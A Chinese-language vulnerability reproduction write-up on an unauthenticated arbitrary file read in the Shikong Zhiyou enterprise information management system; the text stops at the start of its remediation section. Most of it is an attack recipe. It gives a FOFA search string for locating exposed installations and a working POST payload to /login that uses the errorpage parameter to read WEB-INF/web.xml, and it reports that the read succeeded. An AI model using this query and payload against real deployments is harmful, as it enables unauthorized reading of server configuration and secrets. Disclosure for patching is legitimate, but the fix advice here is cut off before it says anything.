时空智友企业信息管理系统任意文件读取漏洞复现

简介

时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。

时空智友企业信息管理系统存在任意文件读取漏洞，攻击者可以在未授权的情况下读取系统上的文件。

漏洞复现

FOFA语法：

body="时空智友企业信息管理"

访问页面如下所示：

POC：

POST请求/login：op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml

返回信息如下：

成功读取到WEB-INF/web.xml该文件

修复建议

在应用